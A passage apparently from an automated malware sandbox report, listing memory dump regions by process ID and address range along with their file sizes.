
                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/2832-78-0x0000000000EB0000-0x0000000000EFC000-memory.dmp

                                                                                        Filesize

                                                                                        304KB

                                                                                      • memory/2976-238-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3088-179-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3284-203-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3548-233-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3620-160-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3620-156-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3620-216-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3668-171-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/3828-225-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/4136-221-0x00007FF6A91F0000-0x00007FF6A924B000-memory.dmp

                                                                                        Filesize

                                                                                        364KB

                                                                                      • memory/4368-144-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                                        Filesize

                                                                                        32KB

                                                                                      • memory/4368-159-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                        Filesize

                                                                                        72KB